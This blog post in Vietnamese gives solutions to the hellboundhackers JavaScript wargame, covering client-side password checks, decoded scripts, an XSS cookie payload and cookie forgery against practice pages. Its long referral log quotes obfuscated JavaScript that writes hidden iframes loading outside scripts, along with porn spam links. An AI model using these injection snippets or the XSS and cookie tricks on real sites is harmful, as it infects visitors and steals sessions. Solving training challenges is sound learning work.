Guru's Blog
share with you :)
Navigation for Guru's Blog - All hellboundhackers JavaScript challenges solution
Content
Sidebar
Footer
Download nhạc từ các trang nhạc lớn của Việt Nam
« hellboundhackers basic web challenges 17...
|
Trang chủ
|
All hellboundhackers Application Mission... »
19 Tháng Sáu 2007
@ 03:02
Ý kiến [0]
All hellboundhackers JavaScript challenges solution
(
Tác giả:
Phạm Đức Hải
)
All
hellboundhackers
JavaScript challenges solution
lv1:
<!--
function pasuser(form) {
if (form.id.value=="partyhard2") {
if (form.pass.value=="lifeisshort1") {
location="index.php?user=partyhard2&pass=lifeissho
rt1"
}
else {
alert("Invalid Password")
}
}
else {
alert("Invalid UserID")
}
}
//-->
lv2:
http://www.hellboundhackers
.org/challenges/js/js2/level2sc
ript.js
<!--
var password, i;
password=prompt("Please enter password!","");
if (password=="level2done") {
location="huh.php"
i=4;
}
else {
alert("Wrong password, you'll go back to the index")
location="index.php"
}
//-->
lv3:
<script>
var U7=window,W8=document;
var a1="%3Cscript%20language%3D
%22JavaScript1.1%22%3E%0D%0A
%3C%21--%0D%0Afunction%20right
%28e%29%20%7B%0D%0A%20%20if%20
%28navigator.appName%20%3D%3D
%20%27Netscape%27%20%26%26%20
%28e.which%20%3D%3D%203%20%7C
%7C%20e.which%20%3D%3D%202%29
%29%0D%0A%20%20%20%20return
%20false%3B%0D%0A%20%20else
%20if%20%28navigator.appName
%20%3D%3D%20%27Microsoft
%20Internet%20Explorer%27%20
%26%26%20%28event.button%20%3D
%3D%202%20%7C%7C%20event
.button%20%3D%3D%203%29%29%20
%7B%0D%0A%20%20%20%20alert%28
%22Rigth-mouse%20click%20isn
%27t%20allowed%21%22%29%3B%0D
%0A%20%20%20%20return%20false
%3B%0D%0A%20%20%7D%0D%0A%20
%20return%20true%3B%0D%0A%7D
%0D%0Adocument.onmousedown
%3Dright%3B%0D%0Aif%20%28docume
nt.layers%29%20window.captureEv
ents%28Event.MOUSEDOWN%29%3B
%0D%0Awindow.onmousedown
%3Dright%3B%0D%0A//--%3E%0D%0A
%3C/script%3E%0D%0A%0D%0A
%3Cscript%20language%3D
%22javascript%22%3E%0D%0A%3C
%21--%0D%0Afunction%20pasuser
%28form%29%20%7B%0D%0Avar
%20text2%3D%27lolage%27%0D
%0Avar%20text4%3D%27hahaomgz
%27%0D%0A%20%20if%20%28form
.text1.value%3D%3Dtext2%29%20
%7B%20%0D%0A%20%20%20%20if%20
%28form.text3.value%3D%3Dtext4
%29%20%7B%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%0D%0A%20
%20%20%20%20%20location%3D
%22index.php%3Ftext1%3Dlol
%26text3%3Dhaha%22%20%0D%0A%20
%20%20%20%7D%0D%0A%20%20%20
%20else%20%7B%0D%0A%20%20%20
%20%20%20alert%28%22Invalid
%20Password%22%29%0D%0A%20%20
%20%20%7D%0D%0A%20%20%7D%0D%0A
%20%20else%20%7B%0D%0A%20%20
%20%20alert%28%22Invalid
%20UserID%22%29%0D%0A%20%20%7D
%0D%0A%7D%0D%0A//--%3E%0D%0A
%3C/script%3E%0D%0A%3Ccenter
%3E%0D%0A%20%20%3Ctable
%20cellpadding%3D%224%22
%20border%3D%220%22%3E%0D%0A
%20%20%20%20%3Ctr%3E%0D%0A%20
%20%20%20%20%20%3Ctd%20align
%3D%22center%22%20height%3D
%2224%22%20width%3D%2284%22
%3EUser%20ID%3A%3C/td%3E%0D%0A
%20%20%20%20%20%20%3Ctd
%20align%3D%22center%22
%20height%3D%2224%22%20width
%3D%22170%22%3E%3Cform%20name
%3D%22login%22%3E%3Cinput
%20name%3D%22text1%22%20type
%3D%22text%22%3E%3C/td%3E%0D
%0A%20%20%20%20%3C/tr%3E%0D%0A
%20%20%20%20%3Ctr%3E%0D%0A%20
%20%20%20%20%20%3Ctd%20align
%3D%22center%22%20height%3D
%2224%22%20width%3D%2284%22
%3EPassword%3A%3C/td%3E%0D%0A
%20%20%20%20%20%20%3Ctd
%20align%3D%22center%22
%20height%3D%2224%22%20width
%3D%22170%22%3E%3Cinput%20name
%3D%22text3%22%20type%3D
%22password%22%3E%3C/td%3E%0D
%0A%20%20%20%20%3C/tr%3E%0D%0A
%20%20%20%20%3Ctr%3E%0D%0A%20
%20%20%20%20%20%3Ctd%20align
%3D%22center%22%20height%3D
%221%22%20width%3D%2284%22%3E
%3Cinput%20type%3D%22button%22
%20value%3D%22Login%22%20onClic
k%3D%22pasuser%28this.form%29
%22%3E%3C/td%3E%0D%0A%20%20%20
%20%20%20%3Ctd%3E%3C/td%3E%0D
%0A%20%20%20%20%3C/tr%3E%0D%0A
%20%20%3C/table%3E%0D%0A%3C
/center%3E";
function V0(){var V0;V0=unescape(a1);W8.write(V0
);}V0();
</script>
Using html decode :
http://scriptasylum.com
/tutorials/encdec/encode
-decode.html
<script>
var U7=window,W8=document;
var a1="<script language="JavaScript1.1">
<!--
function right(e) {
if (navigator.appName == 'Netscape' && (e.which == 3 || e.which == 2))
return false;
else if (navigator.appName == 'Microsoft Internet Explorer' && (event.button == 2 || event.button == 3)) {
alert("Rigth-mouse click isn't allowed!");
return false;
}
return true;
}
document.onmousedown=right;
if (document.layers) window.captureEvents(Event.MOUSEDOWN);
window.onmousedown=right;
//-->
</script>
<script language="javascript">
<!--
function pasuser(form) {
var text2='lolage'
var text4='hahaomgz'
if (form.text1.value==text2) {
if (form.text3.value==text4) {
location="index.php?text1=lol&text3=haha"
}
else {
alert("Invalid Password")
}
}
else {
alert("Invalid UserID")
}
}
//-->
</script>
<center>
<table cellpadding="4" border="0">
<tr>
<td align="center" height="24" width="84">User ID:</td>
<td align="center" height="24" width="170"><form name="login"><input name="text1" type="text"></td>
</tr>
<tr>
<td align="center" height="24" width="84">Password:</td>
<td align="center" height="24" width="170"><input name="text3" type="password"></td>
</tr>
<tr>
<td align="center" height="1" width="84"><input type="button" value="Login" onClick="pasuser(this.form)"></td>
<td></td>
</tr>
</table>
</center>";
function V0(){var V0;V0=unescape(a1);W8.write(V0
);}V0();
</script>
--->
var text2='lolage'
var text4='hahaomgz'
--->
http://www.hellboundhackers
.org/challenges/js/js3/index
.php?text1=lol&text3=haha
Change to :
http://www.hellboundhackers
.org/challenges/js/js3/index
.php?text1=lolage&text3
=hahaomgz
-->ok
lv4:
javascript:alert(document.cookie);document.write (document.cookie);
Using XSS:
http://www.hellboundhackers
.org/challenges/js/js4/index
.php?submit=%3Cscript%3Ealert
(document.cookie)%3C/script%3E
lv 5:
<script language="JavaScript" src="level5.js"></script>
http://www.hellboundhackers
.org/challenges/js/js5/level5
.js
a = prompt("Please enter password!","");
date = new Date();
year = date.getYear();
b = year+12;
if(a == b){
alert("Good job! You got it!");
window.location.href=year+".php";
}
else
{
alert("Try it again!");
}
---->Create a html file :
<html>
<head>
<title>Owned</title>
</head>
<script language="javascript">
a = prompt("Please enter password!","");
date = new Date();
year = date.getYear();
b = year+12;
alert(b);
if(a == b){
alert("Good job! You got it!");
window.location.href=year+".php";
}
else
{
alert("Try it again!");
}
</script>
</html>
---------> alert(b); 118
lv6:
<script language="Javascript">
function checkPass(){
Location = document.form.password.value
Location = "js6-" + "window.open" + ".php"
document.write("Pass= " + Location);
if (document.form.password.value == Location ) {
alert("Good Job!")
window.open(Location)
}
else{
alert("Try Again!")
}
}
</script>
--->pass: js6-window.open.php
lv7 :
Using Flashget download file :
http://www.hellboundhackers
.org/challenges/js/js7/index
.php
<script language="JavaScript">
function password () {
var s1, a2, v3, e4, input;
s1=window.document.bgColor;
a2=window.document.linkColor;
v3=s1.substring (6,9)+a2.substring (2,8);
e4=v3.toUpperCase ();
input=prompt("Password:","");
if (input!=v3 && input!=e4) {
alert("Wrong!");
window.location.href="../index.php";
}
else {
window.location.href=v3+".php";
}
}
</script>
</head>
<body bgcolor="#D0D0D0" text="#FF9900" onLoad="password()" link="#FF9900">
--->pass :0f9900
lv8:
<script>document.cookie="secret=90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe"</script>
Solve : hex->decial->ACSII
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe144 221 59 33 95 35 154 99 63 166 174 60 49 100 63 96 46 234 63 114 81 207 253 240 254
144 221 59 33 95 35 154 99 63 166 174 60 49 100 63 96 46 234 63 114 81 207 253 240 254
A-AZ: 65-90
a-Z : 97-122
max : 254-122 = 132
---> 63 : a,e,i,o,u
63 : a,--> d=97-63=36 : ª
63 : e --> d=101-63 = 38 : ¶
63 : i --> d=105-63 = 42 : º
63 : o --> d=111-63 = 48 : À
63 : u
lv9:
<script>
var c = 34200;
var p = "%68%6F%77%73%6C%69%66%65%3F
%65%61%73%79%2E%00";
var a;
fc();
function fc()
{
if(c>0)
{
document.getElementById("say").innerHTML = "<b><big>Please wait " + c + ' seconds.</big></b>';
c = c - 1;
setTimeout("fc()", 1000)
} else {
a = unescape("%33");
document.getElementById("say").innerHTML = "Your password is: " + unescape(p-a) + unescape("%3C%66%6F%72%6D%20
%61%63%74%69%6F%6E%3D%27%69%6E
%64%65%78%2E%70%68%70%27%20%6D
%65%74%68%6F%64%3D%27%50%4F%53
%54%27%3E%0D%0A%45%6E%74%65%72
%20%50%61%73%73%77%6F%72%64%3A
%20%3C%69%6E%70%75%74%20%74%79
%70%65%3D%27%74%65%78%74%27%20
%6E%61%6D%65%3D%27%70%61%73%73
%27%20%73%74%79%6C%65%3D%27%74
%65%78%74%62%6F%78%27%3E%3C%62
%72%3E%0D%0A%3C%69%6E%70%75%74
%20%74%79%70%65%3D%27%73%75%62
%6D%69%74%27%20%6E%61%6D%65%3D
%27%73%75%62%6D%69%74%27%20%76
%61%6C%75%65%3D%27%43%68%65%63
%6B%20%79%6F%75%20%61%6E%73%77
%65%72%27%20%73%74%79%6C%65%3D
%27%62%75%74%74%6F%6E%27%3E%0D
%0A%3C%2F%66%6F%72%6D%3E%00");
}
}
</script>
decode :
<script>
var c = 34200;
var p = "howslife?easy.";
var a;
fc();
function fc()
{
if(c>0)
{
document.getElementById("say").innerHTML = "<b><big>Please wait " + c + ' seconds.</big></b>';
c = c - 1;
setTimeout("fc()", 1000)
} else {
a = unescape("3");
document.getElementById("say").innerHTML = "Your password is: " + unescape(p-a) + unescape("<form action='index.php' method='POST'>
Enter Password: <input type='text' name='pass' style='textbox'><br>
<input type='submit' name='submit' value='Check you answer' style='button'>
</form>;
}
}
</script>
----: javascript:c=1;Back-->ok
lv10:
<script>
//By system_meltdown
function checkpass()
{
pass=document.password.pass.value;
rawr=unescape('%61%68%6f%79');
string="llama llama duck!";
a=string.charCodeAt(1);
b=string.charCodeAt(7);
c=string.charCodeAt(4);
schloob
60*50/3*a)-(b*c))/2
/5+b;
asdf=rawr+"_"+schloob;
if(pass==asdf)
{
alert('Wahoo you got it!');
}
else
{
alert('Awww shame!');
}
}
</script>
rawr=unescape('%61%68%6f%79')
;decode : rawr=unescape('ahoy');
schloob=9860.4
asdf=ahoy_9860.4
lv11:
<script>
//By system_meltdown
var s = "Llama llama chicken duck, schloob mcfroob, moo asdf qwerty zxcv. Rawr llama kinasd, [insert random crap here]It's hammer on the keyboard time: sfsdfoashdfy78sdfysdfs67dftsdf 6tsdf76as tfa. Well I'm bored, so if you're still reading this I advise you to stop because you are wasting your time....dumbarse
";
var asd = s.charCodeAt(14);
var fdsa = s.charCodeAt(42);
var sadfasf = s.charCodeAt(4);
var moo = s.charCodeAt(43);
var teeep = s.charCodeAt(32);
var asdf = asd+fdsa+sadfasf+moo+teeep;
function checkpass()
{
pass=document.password.pass.value;
if(pass==asdf)
{
alert('Well done dude!');
}
else
{
alert('You suck!');
}
}
</script>
--->javascript:alert(asdf); -->pass : 441
lv12:
<script>
function checkpass()
{
pass=document.password.pass.value;
z=2;
x=z*1.5;
v=z*2;
w=v*1.75;
y=v*1.25;
abc
(y*v*y*x+z)*x+w)*z+y)*v
+w;
if(pass==abc)
{
alert('Congratz! You are good at Math');
}
else
{
alert('Sorry, try again when you learn more Math!');
}
}
</script>
---> pass: 7331
lv13:
<script>document.cookie='authorized
=false'</script>
-->
http://www.hellboundhackers
.org/challenges/js/js13/index
.php?javascript:document
.cookie='authorized=true
'
lv14:
script>
a = screen.width;
if(a != 800)
{
alert('Sorry you do not have the right parameters!');
}else{
window.location='/challenges
/js/js14/index.php?ans=0e110c5f
bf226dffd25740ae56d4edb1'
}
http://www.hellboundhackers
.org/challenges/js/js14/index
.php?ans=0e110c5fbf226dffd25740
ae56d4edb1
lv15:
var a = password.charAt(9)=q
var b = password.charAt(10)=u
var c = password.charAt(4)=e
var d = password.charAt(7)=r
var e = password.charAt(1)=y
var f = password.charAt(6)=""
var g = password.charAt(3)=t
var h = password.charAt(8)=e
var i = password.charAt(0)=s
var j = password.charAt(13)=t
var k = password.charAt(6)=""
var l = password.charAt(5)=m
var m = password.charAt(11)=e
var n = password.charAt(2)=s
var o = password.charAt(12)=s
var riddle = "query test mess";
-->pass : system request
Gửi tặng
||
Bloglines
||
del.icio.us
||
Technorati
||
Digg it!
« hellboundhackers basic web challenges 17...
|
Trang chủ
|
All hellboundhackers Application Mission... »
Chuyên mục:
Giải trí
|
Hack
|
war game
Bài viết liên quan:
Nội dung hội thảo "Ngày an toàn thông tin 26/11/2008"
hackthissite.org (HTS) : web bacsic missions walk through (1-10)
LlyKil - người đã DDoS bkav.com.vn
DDoS bằng DDoS FlashX (2)
DDoS bằng DDoS FlashX
Web vulnerabilities to gain access to the system
Referred by:
javascript var x = [A-Z] (www.google.com.vn)
[Referral]
http://ulcuxabi.freewebsitehosting.com/hardcore-lesbian-show...
[Referral]
hellboundhackers javascript (www.google.it)
[Referral]
http://nzemleub.designcarthosting.com/fuck-lesbian-xxx.html
[Referral]
hellboundhackers (www.google.com.vn)
[Referral]
ulcuxabi (www.google.com)
[Referral]
rawr+" "+moo (www.google.com.py)
[Referral]
rawr+" "+moo (www.google.com)
[Referral]
http://qcuzdiib.mindnmagick.com/cum-drinker-lesbian-nude.htm...
[Referral]
hellboundhackers javascript answers (www.google.com)
[Referral]
%22Login+has+Admin (www.google.pt)
[Referral]
"90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.ca)
[Referral]
hellboundhackers basic 20 (www.google.co.id)
[Referral]
hellboundhackers basic 28 (www.google.co.id)
[Referral]
http://zgresste.sporshok.org/having-lesbian-sex-shower.html
[Referral]
javascript challenges (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.gr)
[Referral]
hellboundhackers answers (www.google.nl)
[Referral]
"90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe" (search.yahoo.com)
[Referral]
"90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe" (search.yahoo.com)
[Referral]
joomla javascript:alert( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%75%6C%74%2E%6F%6F%2E%6C%76%2F%31%35%2F%6A%73%5F%67%6F%5F%66%31%2E%70%68%70%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com)
[Referral]
var riddle = "query test mess" (www.google.co.id)
[Referral]
hellboundhacker solutions (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.nl)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.nl)
[Referral]
hellboundhackers javascript 15 (www.google.nl)
[Referral]
hellboundhackers basic 20 (www.google.hu)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.nl)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.nl)
[Referral]
a = prompt("Please enter password!",""); date = new Date(); year = date.getYear(); b = year+12; (www.google.com)
[Referral]
""hellboundhackers""javascript 16"" (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.nl)
[Referral]
hellboundhackers solution (www.google.nl)
[Referral]
basic 20 hellboundhackers.org (www.google.com.vn)
[Referral]
hellboundhackers challenges (www.google.com)
[Referral]
javascript %3D%22170%22%3E%3C (www.google.com)
[Referral]
hellboundhackers basic 26 (www.google.com.vn)
[Referral]
hellboundhackers Basic 6 (www.google.se)
[Referral]
hellboundhackers basic web hacking 7 (www.google.se)
[Referral]
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%7 (www.google.com)
[Referral]
hellboundhackers basic 8 (www.google.se)
[Referral]
http://74.125.93.104/translate_c?hl=en&sl=vi&u=http://www.gu...
[Referral]
hellboundhackers basic 28 (www.google.com)
[Referral]
llykil server.php (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com)
[Referral]
the password is 65 hellboundhackers (www.google.com)
[Referral]
pass=document.password.pass.value; (www.google.com)
[Referral]
Joomla mailto:%20<script%20language=' (www.google.com)
[Referral]
http://72.14.235.104/translate_c?hl=en&sl=vi&tl=en&u=http://...
[Referral]
%3A%3C/td%3E%0D%0A%20%20%20%20%20%20%3Ctd%20 (www.google.com)
[Referral]
Basic Web Hacking 7 hellboundhackers (www.google.com)
[Referral]
hellboundhackers answers (www.google.com)
[Referral]
hellboundhackers (www.google.de)
[Referral]
www.google co.id [Referrel] google sex com (www.google.com)
[Referral]
hacked by system_meltdown (www.google.se)
[Referral]
var a = password.charAt(9) (www.google.nl)
[Referral]
hellboundhackers solution (www.google.nl)
[Referral]
hellboundhackers javascript 2 (www.google.se)
[Referral]
setTimeout("fc()", 1000) (www.google.com)
[Referral]
hellboundhackers (www.google.fi)
[Referral]
"hellboundhackers" java 16 (www.google.com)
[Referral]
hellboundhackers basic 9 (www.google.com)
[Referral]
hellboundhackers answers (www.google.se)
[Referral]
hellboundhackers answers (www.google.se)
[Referral]
hellboundhackers basic answers (www.google.se)
[Referral]
hellboundhackers challenges solutions (www.google.com)
[Referral]
<html> <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%297Gmjveqi%2964wvg%297H%2966lxxt%297E33oxiw7582svk3xvhww3mjveqi2tlt%2966%2964wx%7Dpi%297H%2966hmwtpe%7D%297Ersri%2966%297I%297G3mjveqi%297I%294E4')</script> </html> (www.google.co.uk)
[Referral]
http://www.hellboundhackers.org/challenges/js/js4/ (www.google.de)
[Referral]
system_meltdown (www.google.co.uk)
[Referral]
HELLBOUNDHACKERS ANSWERS (www.google.co.uk)
[Referral]
hellboundhackers basic web challenge 8 answers (www.google.fr)
[Referral]
hellboundhackers application challenges (www.google.hr)
[Referral]
hellboundhackers javascript solutions (www.google.com)
[Referral]
hellboundhacker basic 9 (www.google.nl)
[Referral]
hellboundhackers basic 2 (www.google.se)
[Referral]
SOLUTION JAVASCRIPT DECODE VIRUS (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com.sg)
[Referral]
hellboundhackers basic 28 (www.google.com)
[Referral]
javascript:alert(document.form.password.value) (www.google.co.id)
[Referral]
document.write joomla '%3C%69%66%72%61% (www.google.com)
[Referral]
guru's blog hellboundhackers (www.google.hr)
[Referral]
hellboundhackers javascript (www.google.com)
[Referral]
javascript charCodeAt==32 (www.google.co.jp)
[Referral]
http://www.m360842.de/
[Referral]
basic hellboundhackers (www.google.ro)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.be)
[Referral]
hellboundhacker answers (www.google.com)
[Referral]
hellboundhackers basic web 18 (www.google.ro)
[Referral]
hellboundhacker javascript solution (www.google.be)
[Referral]
hellboundhackers basic 8 (www.google.com)
[Referral]
hellboundhackers java 4 (www.google.nl)
[Referral]
90:dd:3b:21:5f:23:9a:63:3f:a6:ae:3c:31:64:3f:60:2e:ea:3f:72:51:cf:fd:f0:fe (www.google.nl)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.nl)
[Referral]
%90%dd%3b%21%5f%23%9a%63%3f%a6%ae%3c%31%64%3f%60%2e%ea%3f%72%51%cf%fd%f0%fe) (www.google.nl)
[Referral]
%90%dd%3b%21%5f%23%9a%63%3f%a6%ae%3c%31%64%3f%60%2e%ea%3f%72%51%cf%fd%f0%fe (www.google.nl)
[Referral]
hellboundhackers solution javascript (www.google.nl)
[Referral]
www.hellboundhackers.org +javascript (www.google.com)
[Referral]
hellboundhackers basic 28 how to (www.google.com)
[Referral]
hellboundhackers javascript 8 (www.google.ro)
[Referral]
hellboundhackers basic 20 (www.google.com)
[Referral]
basic 18 hellboundhackers (www.google.com)
[Referral]
form.pass.value== (unescape (www.google.com)
[Referral]
window.location.href=year+".php" (www.google.at)
[Referral]
hellboundhackers basic 11 (www.google.com)
[Referral]
hellboundhackers javascript 4 (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com)
[Referral]
javascript function ? ! 22 27 21 3F (www.google.es)
[Referral]
if(pass == rawr+" "+moo) (www.google.co.uk)
[Referral]
http://www.hellboundhackers.org/challenges (www.google.it)
[Referral]
hellboundhackers basic 20 (www.google.it)
[Referral]
http://www.hellboundhackers.org/challenges (www.google.com)
[Referral]
hellboundhackers baSIC (www.google.com)
[Referral]
http://www.dogchatforum.com/forums/index.php?showuser=4107
[Referral]
hellboundhackers basic 8 (www.google.ca)
[Referral]
hellboundhackers application answers (www.google.co.uk)
[Referral]
hellboundhackers basic 28 (www.google.com)
[Referral]
http://vuau.wordpress.com/2007/11/03/archirve-from-gurunetvn...
[Referral]
hellboundhackers solutions challenges (www.google.com)
[Referral]
sfsdfoashdfy78sdfysdfs67dftsdf 6tsdf76as tfa (www.google.gr)
[Referral]
name%3d%22text1%22%20 (www.google.com)
[Referral]
basic 28 hellboundhackers answer (www.google.com)
[Referral]
secret=90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.de)
[Referral]
hellboundhackers basic 28 (www.google.com)
[Referral]
hellboundhackers challenges (www.google.nl)
[Referral]
hellboundhackers basic 4 (www.google.com)
[Referral]
Javascript Hellboundhackers (www.google.de)
[Referral]
hellboundhackers javascript (www.google.com)
[Referral]
<script>document.cookie="secret=90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe"</script> (www.google.com)
[Referral]
hellboundhackers javascript (www.google.com)
[Referral]
hellboundhackers java solutions (www.google.com)
[Referral]
http://www.hellboundhackers.org/challenges/js/js3/index.php (www.google.de)
[Referral]
Hellboundhackers javascript 2 (www.google.co.il)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.cz)
[Referral]
if (input!=v3 && input!=e4) { (www.google.com.np)
[Referral]
Hellboundhackers basic 18 (www.google.com)
[Referral]
hellboundhackers basic 5 (www.google.be)
[Referral]
hellboundhackers basic 6 (www.google.cz)
[Referral]
Basic 9 hellboundhackers (www.google.de)
[Referral]
hellboundhackers javascript (www.google.de)
[Referral]
guru hellboundhacker (www.google.es)
[Referral]
hellboundhackers +"basic 6" (www.google.is)
[Referral]
hellboundhackers +"basic 6" (www.google.com)
[Referral]
hellboundhackers basic 8 (www.google.com)
[Referral]
hellboundhackers basic 9 (www.google.com)
[Referral]
hellboundhackers scripts (www.google.ro)
[Referral]
"basic 28" hellboundhackers (www.google.com)
[Referral]
secret=90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com)
[Referral]
hellboundhackers basic 7 login (www.google.co.in)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.co.in)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com)
[Referral]
joomla hacked document.write(unescape (www.google.com)
[Referral]
hellboundhackers javascript mission timer (www.google.co.uk)
[Referral]
hellboundhackers basic answers (www.google.co.uk)
[Referral]
secret=90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.pl)
[Referral]
javascript 5 hellboundhackers (www.google.com)
[Referral]
"javascript 16" hellboundhackers (www.google.com)
[Referral]
javascript:document.write(document.cookie) ubuntu (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com)
[Referral]
m360842 (www.google.com)
[Referral]
hellboundhackers (www.google.de)
[Referral]
hellboundhackers basic 28 (www.google.de)
[Referral]
hellboundhackers missions (www.google.co.uk)
[Referral]
www.google.com/vn/trangchu.htm (www.google.com)
[Referral]
hellboundhackers basic 26 (www.google.com)
[Referral]
hellboundhackers answers (www.google.co.il)
[Referral]
javascript 2 hellboundhackers (www.google.lt)
[Referral]
hellboundhackers challenges (www.google.lt)
[Referral]
"var password, i" (www.google.com)
[Referral]
hellboundhackers (www.google.com)
[Referral]
hellboundhackers javascript 15 (www.google.ca)
[Referral]
basic challenges 9 hellboundhackers (www.google.se)
[Referral]
hellboundhackers basic 18 (www.google.se)
[Referral]
hellboundhackers javascript 1 (www.google.com)
[Referral]
solution for hackthissite challenges (www.google.com.np)
[Referral]
hellboundhacker basic web hacking help (www.google.com)
[Referral]
hellboundhackers answers (www.google.co.il)
[Referral]
Hellboundhackers basic 18 (www.google.hr)
[Referral]
hellboundhackers js (www.google.lt)
[Referral]
hellboundhackers+answers (www.google.com)
[Referral]
http://vuau.wordpress.com/category/hack/hackgame/
[Referral]
hellboundhackers application challenge 1 hints (www.google.co.il)
[Referral]
HtmlDecode %5F (www.google.co.in)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com)
[Referral]
hellboundhackers +"basic 6", second link (www.google.no)
[Referral]
hellboundhackers +"basic 6" (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com)
[Referral]
hellboundhackers basic 4 (www.google.de)
[Referral]
hellboundhackers basic 11 (www.google.com)
[Referral]
basic 8 hellboundhackers (www.google.se)
[Referral]
hellboundhackers +"basic 6 (www.google.nl)
[Referral]
hellboundhackers basic missions (www.google.nl)
[Referral]
basic 28 Hellboundhackers (www.google.com)
[Referral]
hellboundhackers app challenges (www.google.de)
[Referral]
hellboundhackers "basic 6" (www.google.com)
[Referral]
90 dd 3b 21 5f 23 9a 63 3f a6 ae 3c 31 64 3f 60 2e ea 3f 72 51 cf fd f0 fe (www.google.com)
[Referral]
hellboundhackers javascript 15 (www.google.com.ph)
[Referral]
hellboundhackers basic 7 (www.google.com.ph)
[Referral]
hellboundhackers javascript challenges (www.google.com)
[Referral]
hellboundhackers javascript 16 (www.google.com)
[Referral]
hellboundhackers app (www.google.de)
[Referral]
Basic 13 Hellboundhacker (www.google.co.uk)
[Referral]
